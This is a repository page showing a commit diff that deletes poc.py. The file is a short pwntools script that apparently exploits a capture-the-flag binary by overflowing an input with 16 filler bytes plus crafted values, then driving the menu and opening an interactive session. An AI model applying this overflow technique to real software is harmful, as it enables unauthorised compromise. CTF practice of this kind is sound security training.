This website works better with JavaScript.
Home
Explore
Help
Sign In
myitinos
/
spell-warz-again-and-again
Watch
1
Star
0
Fork
0
Code
Issues
0
Pull Requests
0
Releases
0
Wiki
Activity
Browse Source
removed poc, it's unrelevant
master
myitinos
5 years ago
parent
bfc68ce717
commit
a7e91b2eab
1 changed files
with
0 additions
and
18 deletions
Split View
Diff Options
Show Stats
Download Patch File
Download Diff File
+0
-18
poc.py
+ 0
- 18
poc.py
View File
@ -1,18 +0,0 @@
from
pwn
import
*
if
__name__
==
"
__main__
"
:
p
=
process
(
"
./main
"
)
print
p
.
recvuntil
(
"
>
"
)
p
.
sendline
(
(
"
A
"
*
16
)
+
(
"
\xff
\xff
\xff
\x0f
\x01
"
)
)
print
p
.
recvuntil
(
"
>
"
)
p
.
sendline
(
"
y
"
)
print
p
.
recvuntil
(
"
>
"
)
p
.
sendline
(
"
2
"
)
print
p
.
recvuntil
(
"
>
"
)
p
.
sendline
(
"
4
"
)
print
p
.
recvuntil
(
"
>
"
)
p
.
sendline
(
"
y
"
)
for
i
in
xrange
(
99
)
:
print
p
.
recvuntil
(
"
>
"
)
p
.
sendline
(
"
9
"
)
p
.
interactive
(
)
Write
Preview
Loading…
Cancel
Save